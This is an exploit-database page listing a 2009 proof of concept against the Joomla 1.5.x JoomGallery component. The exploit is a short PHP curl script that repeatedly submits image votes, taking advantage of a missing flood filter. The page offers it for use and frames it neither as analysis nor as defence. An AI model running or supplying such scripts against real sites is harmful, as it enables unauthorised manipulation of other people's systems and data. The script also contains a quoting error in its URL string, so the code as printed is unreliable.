[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla 1.5.x com_joomgallery&func Incorrect Flood Filter

Author
Jbyte
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10079
Category
web applications
Date add
04-12-2009
Platform
unsorted
========================================================
Joomla 1.5.x com_joomgallery&func Incorrect Flood Filter
========================================================

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://server/index.php?option=com_joomgallery&func=votepic&id="here id de voto"&Itemid=85");
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_POSTFIELDS,"imgvote=5&Votar%21=Votar%21");
curl_exec($ch);
 
curl_close($ch);
?>



#  0day.today [2024-11-15]  #